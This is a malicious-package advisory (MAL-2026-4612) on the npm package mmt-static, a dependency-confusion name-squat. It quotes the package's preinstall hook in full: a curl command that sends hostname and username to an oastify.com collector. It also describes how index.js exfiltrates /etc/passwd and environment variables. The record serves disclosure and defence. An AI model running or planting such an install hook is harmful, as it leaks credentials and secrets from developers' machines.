MAL-2026-4612

    Dashboard / Malicious Package / MAL-2026-4612

    MAL-2026-4612

    Published: 22 May 2026Last Modified: 29 May 2026Aliases: 
    GHSA-3c6q-cfmj-gmcf

    Summary: Malicious code in mmt-static (npm)

    Details: Source: amazon-inspector (755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300) On `npm install`, the package's preinstall lifecycle hook executes `node index.js && curl --data-urlencode "info=$(hostname && whoami)" http://8irluql1d21jmq8tr5n5fyoxjopfdd12.oastify.com/nasa/mmt-static`. index.js reads `/etc/passwd`, collects `os.hostname()`, `os.platform()`, `os.userInfo().username`, current working directory, and the first 30 entries of `process.env`, then POSTs the JSON payload to `https://3nrgzlqwix6erldow0s0kttsojuai36s.oastify.com/nasa/mmt-static/<id>`. The package additionally exhibits dependency-confusion shape: its description claims to be an AWS internal CDK package (`cdk-sagemaker-notebook-workflow`) and the README contains `Takeover By l0bo`, indicating an intentional name-squat against an AWS-internal namespace. Installing this package leaks the installer's hostname, username, local user database, working directory, and environment variables (which commonly contain CI/CD secrets, cloud credentials, and tokens) to attacker-controlled Burp Collaborator (oastify.com) endpoints. Source: ghsa-malware (8459650553ee494191b0a2f03104e537518003f05ab481da8256157746c79c33) Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

    Affected packages

    Package

    Name: mmt-static

    Purl: pkg:npm/mmt-static

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 0
    Fixed -None

    Affected versions

    1.0.0
    MAL-2026-4612 | CVE-DB